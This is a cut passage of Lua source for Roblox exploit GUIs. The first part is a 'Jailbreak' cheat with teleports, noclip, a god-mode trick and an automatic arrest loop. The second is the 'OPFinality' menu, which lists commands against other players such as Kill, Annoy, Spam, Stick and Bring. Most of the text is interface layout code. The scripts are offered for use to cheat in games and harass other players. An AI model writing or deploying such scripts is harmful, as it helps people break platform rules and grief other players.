Vault.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(32.214, 2.67609, 818.648926) + Vector3.new(1,0,0) end) Jewlery.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(137.325, 17.878, 1320.123) + Vector3.new(1,0,0) end) -- Player Teleporting local PLR = game:GetService("Players").LocalPlayer local Players = game:GetService("Players"):GetPlayers() local Selected1 = game:GetService("CoreGui").JailbreakBroken.UI.TPBFrame.SPlayer val.Name = "Selected" function alphabetize(p1, p2) local Player1 = p1.Name:lower() local P1 = Player1:sub(1, 1):byte() local Player2 = p2.Name:lower() local P2 = Player2:sub(1, 1):byte() if P1 < P2 then return true else return false end end table.sort(Players, alphabetize) for i = 1, #Players do local p = Players[i] if p ~= PLR then local btn = Instance.new("TextButton", sframe) btn.Name = p.Name btn.Text = p.Name btn.Size = UDim2.new(0, 260, 0, 25) btn.Font = Enum.Font.Highway btn.FontSize = Enum.FontSize.Size14 btn.TextColor3 = Color3.new(255, 255, 255) btn.BackgroundTransparency = 1 btn.Position = UDim2.new(0, 0, 0, (i * 25) - 25) sframe.CanvasSize = UDim2.new(0, 0, 0, (#Players * 25) - 25) btn.MouseButton1Click:connect(function() val.Value = p Selected1.Text = "Player: "..p.Name end) end end function update() for i, btn in ipairs(sframe:GetChildren()) do if btn:IsA("TextButton") then btn:Destroy() end end local plrs = game:GetService("Players"):GetPlayers() table.sort(plrs, alphabetize) for i = 1, #plrs do local p = plrs[i] if p ~= PLR then local btn = Instance.new("TextButton", sframe) btn.Text = p.Name btn.Size = UDim2.new(0, 260, 0, 25) btn.Font = Enum.Font.Highway btn.FontSize = Enum.FontSize.Size14 btn.TextColor3 = Color3.new(255, 255, 255) btn.BackgroundTransparency = 1 btn.Position = UDim2.new(0, 0, 0, (i * 25) - 25) sframe.CanvasSize = UDim2.new(0, 0, 0, (#Players * 25) - 25) btn.MouseButton1Click:connect(function() val.Value = p SPlayer.Text = "Player: "..p.Name end) end end end game:GetService("Players").PlayerAdded:connect(update) game:GetService("Players").PlayerRemoving:connect(update) -- Functions function getPlayer() if val.Value:IsA("Player") and val.Value.Character:FindFirstChild("HumanoidRootPart") then return val.Value else return nil end end PTP.MouseButton1Click:connect(function() local p = getPlayer() if p then PLR.Character.HumanoidRootPart.CFrame = p.Character.HumanoidRootPart.CFrame + Vector3.new(0, 3, 0) else PTP.Text = "404"; wait(1); PTP.Text = "TP To Player" end end) noclip = false game:GetService('RunService').Stepped:connect(function() if noclip then game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(11) end end) Noclipp.MouseButton1Click:connect(function() noclip = not noclip if Noclipp.Text == "Enable Noclip" then Noclipp.Text = "Disable Noclip" else Noclipp.Text = "Enable Noclip" end end) God.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" end) Arrest.MouseButton1Click:connect(function() local Player = game:GetService("Players").LocalPlayer wait(0.5) for i,v in pairs(game.Teams.Criminal:GetPlayers()) do repeat wait() Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 1) until v.Team.Name ~= "Criminal" end end) local frame = game:GetService("CoreGui").JailbreakBroken:WaitForChild('UI') OpenGUI.MouseButton1Down:connect(function() frame.Visible = not frame.Visible if frame.Visible == true then OpenGUI.Text = "Close GUI" elseif frame.Visible == false then OpenGUI.Text = "Open GUI" end end) Teleports.MouseButton1Click:connect(function() game:GetService("CoreGui").JailbreakBroken.UI.TPBFrame.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.Teleports.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Functions.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Credits.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.GoBack.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.cframe.Visible = false end) Functions.MouseButton1Click:connect(function() game:GetService("CoreGui").JailbreakBroken.UI.FBFrame.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.Teleports.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Functions.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Credits.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.GoBack.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.cframe.Visible = false end) GoBack.MouseButton1Click:connect(function() GoBack.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.FBFrame.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.TPBFrame.Visible = false Teleports.Visible = true Functions.Visible = true Credits.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.cframe.Visible = false end) Credits.MouseButton1Click:connect(function() game:GetService("CoreGui").JailbreakBroken.UI.FBFrame.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Teleports.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Functions.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.Credits.Visible = false game:GetService("CoreGui").JailbreakBroken.UI.GoBack.Visible = true game:GetService("CoreGui").JailbreakBroken.UI.cframe.Visible = true end) end) TextLabel.Parent = Main TextLabel.BackgroundColor3 = Color3.new(0, 0, 0) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0.336690634, 0, 0.128027678, 0) TextLabel.Size = UDim2.new(0, 200, 0, 24) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Thank you for using TRINIT!" TextLabel.TextColor3 = Color3.new(1, 1, 1) TextLabel.TextSize = 23 fehaxguiv2.Name = "fehaxguiv2" fehaxguiv2.Parent = Main fehaxguiv2.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) fehaxguiv2.Position = UDim2.new(0.634053767, 0, 0.235294119, 0) fehaxguiv2.Size = UDim2.new(0, 149, 0, 17) fehaxguiv2.Font = Enum.Font.SourceSans fehaxguiv2.Text = "OPFinality" fehaxguiv2.TextColor3 = Color3.new(0, 0, 0) fehaxguiv2.TextSize = 28 fehaxguiv2.MouseButton1Down:connect(function() wait(0.3) -- Objects -- CREDIT TO xFunnieuss / Timeless for partial (short) names. OPFinality = Instance.new("ScreenGui") MainFrame = Instance.new("Frame") TopFrame = Instance.new("Frame") CloseGUI = Instance.new("TextButton") MenuEnterFrame = Instance.new("Frame") Title = Instance.new("TextLabel") OpenMenu = Instance.new("ImageButton") Pages = Instance.new("Frame") Information = Instance.new("Frame") Image_FE_ENABLED = Instance.new("ImageLabel") Text_FE_ENABLED = Instance.new("TextLabel") WhatIsOPFinality = Instance.new("TextLabel") Text_FE_DISABLED = Instance.new("TextLabel") OPFin_Description = Instance.new("TextLabel") OPFin_Warning = Instance.new("TextLabel") Info_Bar = Instance.new("Frame") Info_Background = Instance.new("Frame") Warning_Bar = Instance.new("Frame") Warning_Background = Instance.new("Frame") Info_Image = Instance.new("ImageLabel") Image_FE_DISABLED = Instance.new("ImageLabel") Warn_Image = Instance.new("ImageLabel") Others_1 = Instance.new("Frame") OthersTitle = Instance.new("TextLabel") Char_Image = Instance.new("ImageLabel") OthersText = Instance.new("TextLabel") TXTBOX_PlrName = Instance.new("TextBox") othersBaseBackground = Instance.new("Frame") TeleportTo = Instance.new("TextButton") Annoy = Instance.new("TextButton") Follow = Instance.new("TextButton") View = Instance.new("TextButton") Orbit = Instance.new("TextButton") HeadWalk = Instance.new("TextButton") Stick = Instance.new("TextButton") Spam = Instance.new("TextButton") Carpet = Instance.new("TextButton") Others_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE = Instance.new("ImageLabel") Character_2 = Instance.new("Frame") CharacterTitle = Instance.new("TextLabel") CharacterText = Instance.new("TextLabel") Animations_SPOOKY = Instance.new("Frame") spookytitle = Instance.new("TextLabel") headthrow = Instance.new("TextButton") armsoff = Instance.new("TextButton") loophead = Instance.new("TextButton") levitate = Instance.new("TextButton") headfloat = Instance.new("TextButton") Character_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE = Instance.new("ImageLabel") Animations_DANCE = Instance.new("Frame") dancetitle = Instance.new("TextLabel") normal = Instance.new("TextButton") movingdance = Instance.new("TextButton") insane = Instance.new("TextButton") happy = Instance.new("TextButton") spindance = Instance.new("TextButton") Animations_HEROIC = Instance.new("Frame") heroictitle = Instance.new("TextLabel") swordstrike = Instance.new("TextButton") jumpland = Instance.new("TextButton") punches = Instance.new("TextButton") swing = Instance.new("TextButton") crawl = Instance.new("TextButton") Char2_Image = Instance.new("ImageLabel") Character_1 = Instance.new("Frame") CharacterTitle_2 = Instance.new("TextLabel") Char_Image_2 = Instance.new("ImageLabel") CharacterText_2 = Instance.new("TextLabel") TXTBOX_Stats = Instance.new("TextBox") BackGroundChar = Instance.new("Frame") HipHeight = Instance.new("TextButton") JumpHeight = Instance.new("TextButton") Speed = Instance.new("TextButton") TXTBOX_Chat = Instance.new("TextBox") BackGroundChar2 = Instance.new("Frame") Chat = Instance.new("TextButton") Spam_2 = Instance.new("TextButton") BackGroundChar3 = Instance.new("Frame") Noclip = Instance.new("TextButton") Fly = Instance.new("TextButton") Character_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE_2 = Instance.new("ImageLabel") Others_2 = Instance.new("Frame") OthersTitle_2 = Instance.new("TextLabel") Other_Image2 = Instance.new("ImageLabel") OthersText_2 = Instance.new("TextLabel") TXTBOX_PlrName2 = Instance.new("TextBox") othersBaseBackground2 = Instance.new("Frame") Flatten = Instance.new("TextButton") AimHead = Instance.new("TextButton") Float = Instance.new("TextButton") Multiple = Instance.new("TextButton") Animated = Instance.new("TextButton") SlowAttract = Instance.new("TextButton") WeirdOrbit = Instance.new("TextButton") Violent = Instance.new("TextButton") Max = Instance.new("TextButton") Others_toPAGE3 = Instance.new("TextButton") Character_toPAGE3_IMAGE = Instance.new("ImageLabel") Others_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE_2 = Instance.new("ImageLabel") Extra_1 = Instance.new("Frame") Extra_Image = Instance.new("ImageLabel") ExtraText = Instance.new("TextLabel") ExtraBaseBackGround1 = Instance.new("Frame") CrouchRocket = Instance.new("TextButton") ExtraBaseBackGround1Side = Instance.new("Frame") CloneIllusion = Instance.new("TextButton") CoolSpin = Instance.new("TextButton") JumpRocket = Instance.new("TextButton") Extra_toPAGE2 = Instance.new("TextButton") Character_toPAGE2_IMAGE_3 = Instance.new("ImageLabel") Extra_Title = Instance.new("TextLabel") ExtraBaseBackGround2 = Instance.new("Frame") NoLimbs = Instance.new("TextButton") FEGodmode = Instance.new("TextButton") BrickHats = Instance.new("TextButton") RapidPunch = Instance.new("TextButton") ExtraBaseBackGround2Side = Instance.new("Frame") ExtraBaseBackGround3 = Instance.new("Frame") PunchFollow = Instance.new("TextButton") ArmFollow = Instance.new("TextButton") Spin = Instance.new("TextButton") Faint = Instance.new("TextButton") ExtraBaseBackGround3Side = Instance.new("Frame") Extra_2 = Instance.new("Frame") Extra_Image_2 = Instance.new("ImageLabel") ExtraText_2 = Instance.new("TextLabel") Extra_Title_2 = Instance.new("TextLabel") ExtraBaseBackGround2_2 = Instance.new("Frame") CrouchAttack = Instance.new("TextButton") WalkThrough = Instance.new("TextButton") CreepyWatch = Instance.new("TextButton") SpinAttack = Instance.new("TextButton") ExtraBaseBackGround2Side_2 = Instance.new("Frame") TXTBOX_PlrNameEXTRA = Instance.new("TextBox") _18 = Instance.new("TextButton") SlamPropulsion = Instance.new("TextButton") Extra_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE_3 = Instance.new("ImageLabel") Others_3 = Instance.new("Frame") OthersTitle_3 = Instance.new("TextLabel") Other_Image3 = Instance.new("ImageLabel") OthersText_3 = Instance.new("TextLabel") TXTBOX_PlrNameOTHER3 = Instance.new("TextBox") othersBaseBackground3 = Instance.new("Frame") FreeFall = Instance.new("TextButton") Attach = Instance.new("TextButton") Bring = Instance.new("TextButton") SafeKill = Instance.new("TextButton") SuperSpin = Instance.new("TextButton") Kill = Instance.new("TextButton") Others_backPAGE2 = Instance.new("TextButton") Character_toPAGE1_IMAGE_4 = Instance.new("ImageLabel") Games = Instance.new("Frame") Games_IMAGE = Instance.new("ImageLabel") GamesText = Instance.new("TextLabel") Games_TITLE = Instance.new("TextLabel") Games_IMAGE2 = Instance.new("ImageLabel") SwordFightingTournament = Instance.new("TextButton") PlatesOfFateMayhem = Instance.new("TextButton") GamesText2 = Instance.new("TextLabel") Frappe = Instance.new("TextButton") Frappe_2 = Instance.new("TextButton") MenuFrame = Instance.new("Frame") Welcome = Instance.new("TextLabel") NameOfPlayer = Instance.new("TextLabel") T_Information = Instance.new("TextButton") T_InfoImage = Instance.new("ImageLabel") T_Character = Instance.new("TextButton") T_CharImage = Instance.new("ImageLabel") T_Games = Instance.new("TextButton") T_GameImage = Instance.new("ImageLabel") T_Others = Instance.new("TextButton") T_OtherImage = Instance.new("ImageLabel") T_Extra = Instance.new("TextButton") T_ExtraImage = Instance.new("ImageLabel") DeleteGUI = Instance.new("TextButton") DELETEIMAGE = Instance.new("ImageLabel") Darkness = Instance.new("TextButton") -- Properties OPFinality.Name = "OPFinality" OPFinality.Parent = game:GetService("CoreGui") MainFrame.Name = "MainFrame" MainFrame.Parent = OPFinality MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.BorderSizePixel = 0 MainFrame.ClipsDescendants = true MainFrame.Draggable = true MainFrame.Position = UDim2.new(0, 402, 0, 162) MainFrame.Size = UDim2.new(0, 442, 0, 293) TopFrame.Name = "TopFrame" TopFrame.Parent = MainFrame TopFrame.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) TopFrame.BorderColor3 = Color3.new(0.145098, 0.184314, 0.223529) TopFrame.BorderSizePixel = 0 TopFrame.Size = UDim2.new(1, 0, 0.0741975307, 0) TopFrame.ZIndex = 7 CloseGUI.Parent = TopFrame CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0.951219499, 0, 0, 0) CloseGUI.Size = UDim2.new(0.048780486, 0, 1.00166667, 0) CloseGUI.Font = Enum.Font.Cartoon CloseGUI.FontSize = Enum.FontSize.Size28 CloseGUI.Text = "X" CloseGUI.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CloseGUI.TextSize = 25 CloseGUI.ZIndex = 8 MenuEnterFrame.Name = "MenuEnterFrame" MenuEnterFrame.Parent = MainFrame MenuEnterFrame.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) MenuEnterFrame.BorderColor3 = Color3.new(0.145098, 0.184314, 0.223529) MenuEnterFrame.BorderSizePixel = 0 MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) MenuEnterFrame.Size = UDim2.new(1, 0, 0.148395061, 0) MenuEnterFrame.ZIndex = 5 Title.Name = "Title" Title.Parent = MenuEnterFrame Title.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0.341463417, 0, 0, 0) Title.Size = UDim2.new(0.292682916, 0, 1.00166667, 0) Title.Font = Enum.Font.SourceSansLight Title.FontSize = Enum.FontSize.Size32 Title.Text = "OPFinality" Title.TextColor3 = Color3.new(0.933333, 0.933333, 0.933333) Title.TextSize = 30 Title.ZIndex = 6 OpenMenu.Name = "OpenMenu" OpenMenu.Parent = MenuEnterFrame OpenMenu.BackgroundColor3 = Color3.new(1, 1, 1) OpenMenu.BackgroundTransparency = 1 OpenMenu.Size = UDim2.new(0.0909999982, 0, 1.01999998, 0) OpenMenu.Image = "http://www.roblox.com/asset/?id=1280184088" OpenMenu.ZIndex = 6 Pages.Name = "Pages" Pages.Parent = MainFrame Pages.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Pages.BorderSizePixel = 0 Pages.Position = UDim2.new(0, 0, 0.222592592, 0) Pages.Size = UDim2.new(1, 0, 0.779074073, 0) Information.Name = "Information" Information.Parent = Pages Information.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Information.BorderSizePixel = 0 Information.Size = UDim2.new(1, 0, 1, 0) Image_FE_ENABLED.Name = "Image_FE_ENABLED" Image_FE_ENABLED.Parent = Information Image_FE_ENABLED.BackgroundColor3 = Color3.new(1, 1, 1) Image_FE_ENABLED.BackgroundTransparency = 1 Image_FE_ENABLED.Position = UDim2.new(0.0227242485, 0, 0.0454809628, 0) Image_FE_ENABLED.Size = UDim2.new(0.136345491, 0, 0.263394117, 0) Image_FE_ENABLED.Visible = false Image_FE_ENABLED.Image = "http://www.roblox.com/asset/?id=1281289312" Text_FE_ENABLED.Name = "Text_FE_ENABLED" Text_FE_ENABLED.Parent = Information Text_FE_ENABLED.BackgroundColor3 = Color3.new(1, 1, 1) Text_FE_ENABLED.BackgroundTransparency = 1 Text_FE_ENABLED.Position = UDim2.new(0.158999994, 0, 0.0670000017, 0) Text_FE_ENABLED.Size = UDim2.new(0.795348704, 0, 0.227404833, 0) Text_FE_ENABLED.Visible = false Text_FE_ENABLED.Font = Enum.Font.SourceSansItalic Text_FE_ENABLED.FontSize = Enum.FontSize.Size24 Text_FE_ENABLED.Text = "This game is Filtering Enabled! Enjoy using OPFinality." Text_FE_ENABLED.TextSize = 19 WhatIsOPFinality.Name = "WhatIsOPFinality" WhatIsOPFinality.Parent = Information WhatIsOPFinality.BackgroundColor3 = Color3.new(1, 1, 1) WhatIsOPFinality.BackgroundTransparency = 1 WhatIsOPFinality.Position = UDim2.new(0.249966726, 0, 0.227404833, 0) WhatIsOPFinality.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) WhatIsOPFinality.Font = Enum.Font.SourceSansBold WhatIsOPFinality.FontSize = Enum.FontSize.Size28 WhatIsOPFinality.Text = "What is OPFinality?" WhatIsOPFinality.TextSize = 25 Text_FE_DISABLED.Name = "Text_FE_DISABLED" Text_FE_DISABLED.Parent = Information Text_FE_DISABLED.BackgroundColor3 = Color3.new(1, 1, 1) Text_FE_DISABLED.BackgroundTransparency = 1 Text_FE_DISABLED.Position = UDim2.new(0.158999994, 0, 0.0670000017, 0) Text_FE_DISABLED.Size = UDim2.new(0.545381963, 0, 0.227404833, 0) Text_FE_DISABLED.Font = Enum.Font.SourceSansItalic Text_FE_DISABLED.FontSize = Enum.FontSize.Size24 Text_FE_DISABLED.Text = "Oh! This game is Filtering Disabled..." Text_FE_DISABLED.TextSize = 19 OPFin_Description.Name = "OPFin_Description" OPFin_Description.Parent = Information OPFin_Description.BackgroundColor3 = Color3.new(1, 1, 1) OPFin_Description.BackgroundTransparency = 1 OPFin_Description.Position = UDim2.new(0.204999998, 0, 0.388000011, 0) OPFin_Description.Size = UDim2.new(0.772624433, 0, 0.181923851, 0) OPFin_Description.ZIndex = 3 OPFin_Description.Font = Enum.Font.SourceSans OPFin_Description.FontSize = Enum.FontSize.Size18 OPFin_Description.Text = "OPFinality is an FE GUI developed by illremember made for giving you power in Filtering Enabled games." OPFin_Description.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) OPFin_Description.TextSize = 18 OPFin_Description.TextWrapped = true OPFin_Warning.Name = "OPFin_Warning" OPFin_Warning.Parent = Information OPFin_Warning.BackgroundColor3 = Color3.new(1, 1, 1) OPFin_Warning.BackgroundTransparency = 1 OPFin_Warning.Position = UDim2.new(0.0227242485, 0, 0.636733532, 0) OPFin_Warning.Size = UDim2.new(0.659003198, 0, 0.272885799, 0) OPFin_Warning.ZIndex = 2 OPFin_Warning.Font = Enum.Font.SourceSans OPFin_Warning.FontSize = Enum.FontSize.Size18 OPFin_Warning.Text = "If this game is detected as Filtering Disabled, this GUI wont work as well as other scripts would. Consider using a different script." OPFin_Warning.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) OPFin_Warning.TextSize = 18 OPFin_Warning.TextWrapped = true Info_Bar.Name = "Info_Bar" Info_Bar.Parent = Information Info_Bar.BackgroundColor3 = Color3.new(0.160784, 0.501961, 0.72549) Info_Bar.BorderSizePixel = 0 Info_Bar.Position = UDim2.new(0.159069732, 0, 0.363847703, 0) Info_Bar.Size = UDim2.new(0.0227242485, 0, 0.227404833, 0) Info_Background.Name = "Info_Background" Info_Background.Parent = Information Info_Background.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Info_Background.BorderSizePixel = 0 Info_Background.Position = UDim2.new(0.181793988, 0, 0.363847703, 0) Info_Background.Size = UDim2.new(0.819999993, 0, 0.226999998, 0) Info_Background.ZIndex = 2 Warning_Bar.Name = "Warning_Bar" Warning_Bar.Parent = Information Warning_Bar.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) Warning_Bar.BorderSizePixel = 0 Warning_Bar.Position = UDim2.new(0.70445168, 0, 0.636733532, 0) Warning_Bar.Size = UDim2.new(0.0227242485, 0, 0.272885799, 0) Warning_Background.Name = "Warning_Background" Warning_Background.Parent = Information Warning_Background.BackgroundColor3 = Color3.new(0.945098, 0.768628, 0.0588235) Warning_Background.BorderSizePixel = 0 Warning_Background.Position = UDim2.new(0, 0, 0.636733532, 0) Warning_Background.Size = UDim2.new(0.70445168, 0, 0.272885799, 0) Info_Image.Name = "Info_Image" Info_Image.Parent = Information Info_Image.BackgroundColor3 = Color3.new(1, 1, 1) Info_Image.BackgroundTransparency = 1 Info_Image.Position = UDim2.new(0.0454484969, 0, 0.395091146, 0) Info_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Info_Image.Image = "http://www.roblox.com/asset/?id=1281284684" Image_FE_DISABLED.Name = "Image_FE_DISABLED" Image_FE_DISABLED.Parent = Information Image_FE_DISABLED.BackgroundColor3 = Color3.new(1, 1, 1) Image_FE_DISABLED.BackgroundTransparency = 1 Image_FE_DISABLED.Position = UDim2.new(0.0227242485, 0, 0.0454809628, 0) Image_FE_DISABLED.Size = UDim2.new(0.136345491, 0, 0.263394117, 0) Image_FE_DISABLED.Image = "http://www.roblox.com/asset/?id=1281290326" Warn_Image.Name = "Warn_Image" Warn_Image.Parent = Information Warn_Image.BackgroundColor3 = Color3.new(1, 1, 1) Warn_Image.BackgroundTransparency = 1 Warn_Image.Position = UDim2.new(0.763000011, 0, 0.677999973, 0) Warn_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Warn_Image.Image = "http://www.roblox.com/asset/?id=1281286925" Others_1.Name = "Others_1" Others_1.Parent = Pages Others_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_1.BorderSizePixel = 0 Others_1.Position = UDim2.new(1.00752497, 0, 0, 0) Others_1.Size = UDim2.new(1, 0, 1, 0) OthersTitle.Name = "OthersTitle" OthersTitle.Parent = Others_1 OthersTitle.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle.BackgroundTransparency = 1 OthersTitle.Position = UDim2.new(0.226410091, 0, 0.0439298227, 0) OthersTitle.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle.Font = Enum.Font.SourceSansBold OthersTitle.FontSize = Enum.FontSize.Size28 OthersTitle.Text = "Others" OthersTitle.TextSize = 25 Char_Image.Name = "Char_Image" Char_Image.Parent = Others_1 Char_Image.BackgroundColor3 = Color3.new(1, 1, 1) Char_Image.BackgroundTransparency = 1 Char_Image.Position = UDim2.new(0.0113205044, 0, 0.153754383, 0) Char_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Char_Image.Image = "http://www.roblox.com/asset/?id=1281476978" OthersText.Name = "OthersText" OthersText.Parent = Others_1 OthersText.BackgroundColor3 = Color3.new(1, 1, 1) OthersText.BackgroundTransparency = 1 OthersText.Position = UDim2.new(0.101884536, 0, 0.153754383, 0) OthersText.Size = UDim2.new(0.781114817, 0, 0.175719291, 0) OthersText.Font = Enum.Font.SourceSansItalic OthersText.FontSize = Enum.FontSize.Size24 OthersText.Text = "Use a set of basic commands on other players! Enter a name into the textbox, supports partial names." OthersText.TextSize = 19 OthersText.TextWrapped = true TXTBOX_PlrName.Name = "TXTBOX_PlrName" TXTBOX_PlrName.Parent = Others_1 TXTBOX_PlrName.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrName.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrName.BorderSizePixel = 0 TXTBOX_PlrName.Position = UDim2.new(0.249051109, 0, 0.395368397, 0) TXTBOX_PlrName.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrName.ZIndex = 2 TXTBOX_PlrName.Font = Enum.Font.SourceSans TXTBOX_PlrName.FontSize = Enum.FontSize.Size14 TXTBOX_PlrName.Text = "Player" TXTBOX_PlrName.TextScaled = true TXTBOX_PlrName.TextSize = 14 TXTBOX_PlrName.TextWrapped = true othersBaseBackground.Name = "othersBaseBackground" othersBaseBackground.Parent = Others_1 othersBaseBackground.BackgroundColor3 = Color3.new(0.160784, 0.501961, 0.72549) othersBaseBackground.BorderSizePixel = 0 othersBaseBackground.Position = UDim2.new(0.124525554, 0, 0.351438582, 0) othersBaseBackground.Size = UDim2.new(0.769999981, 0, 0.649999976, 0) TeleportTo.Name = "TeleportTo" TeleportTo.Parent = othersBaseBackground TeleportTo.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) TeleportTo.BorderSizePixel = 0 TeleportTo.Position = UDim2.new(0.0294333119, 0, 0.27070269, 0) TeleportTo.Size = UDim2.new(0, 92, 0, 25) TeleportTo.Font = Enum.Font.SourceSans TeleportTo.FontSize = Enum.FontSize.Size24 TeleportTo.Text = "Teleport To" TeleportTo.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) TeleportTo.TextSize = 22 Annoy.Name = "Annoy" Annoy.Parent = othersBaseBackground Annoy.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Annoy.BorderSizePixel = 0 Annoy.Position = UDim2.new(0.0294333119, 0, 0.507567585, 0) Annoy.Size = UDim2.new(0, 92, 0, 25) Annoy.Font = Enum.Font.SourceSans Annoy.FontSize = Enum.FontSize.Size24 Annoy.Text = "Annoy" Annoy.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Annoy.TextSize = 22 Follow.Name = "Follow" Follow.Parent = othersBaseBackground Follow.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Follow.BorderSizePixel = 0 Follow.Position = UDim2.new(0.0294333119, 0, 0.744432449, 0) Follow.Size = UDim2.new(0, 92, 0, 25) Follow.Font = Enum.Font.SourceSans Follow.FontSize = Enum.FontSize.Size24 Follow.Text = "Follow" Follow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Follow.TextSize = 22 View.Name = "View" View.Parent = othersBaseBackground View.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) View.BorderSizePixel = 0 View.Position = UDim2.new(0.367916405, 0, 0.27070269, 0) View.Size = UDim2.new(0, 92, 0, 25) View.Font = Enum.Font.SourceSans View.FontSize = Enum.FontSize.Size24 View.Text = "View" View.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) View.TextSize = 22 Orbit.Name = "Orbit" Orbit.Parent = othersBaseBackground Orbit.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Orbit.BorderSizePixel = 0 Orbit.Position = UDim2.new(0.367916405, 0, 0.507567585, 0) Orbit.Size = UDim2.new(0, 92, 0, 25) Orbit.Font = Enum.Font.SourceSans Orbit.FontSize = Enum.FontSize.Size24 Orbit.Text = "Orbit" Orbit.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Orbit.TextSize = 22 HeadWalk.Name = "HeadWalk" HeadWalk.Parent = othersBaseBackground HeadWalk.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) HeadWalk.BorderSizePixel = 0 HeadWalk.Position = UDim2.new(0.367916405, 0, 0.744432449, 0) HeadWalk.Size = UDim2.new(0, 92, 0, 25) HeadWalk.Font = Enum.Font.SourceSans HeadWalk.FontSize = Enum.FontSize.Size24 HeadWalk.Text = "Head Walk" HeadWalk.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) HeadWalk.TextSize = 22 Stick.Name = "Stick" Stick.Parent = othersBaseBackground Stick.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Stick.BorderSizePixel = 0 Stick.Position = UDim2.new(0.7063995, 0, 0.27070269, 0) Stick.Size = UDim2.new(0, 92, 0, 25) Stick.Font = Enum.Font.SourceSans Stick.FontSize = Enum.FontSize.Size24 Stick.Text = "Stick" Stick.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Stick.TextSize = 22 Spam.Name = "Spam" Spam.Parent = othersBaseBackground Spam.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Spam.BorderSizePixel = 0 Spam.Position = UDim2.new(0.7063995, 0, 0.507567585, 0) Spam.Size = UDim2.new(0, 92, 0, 25) Spam.Font = Enum.Font.SourceSans Spam.FontSize = Enum.FontSize.Size24 Spam.Text = "Spam" Spam.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spam.TextSize = 22 Carpet.Name = "Carpet" Carpet.Parent = othersBaseBackground Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) 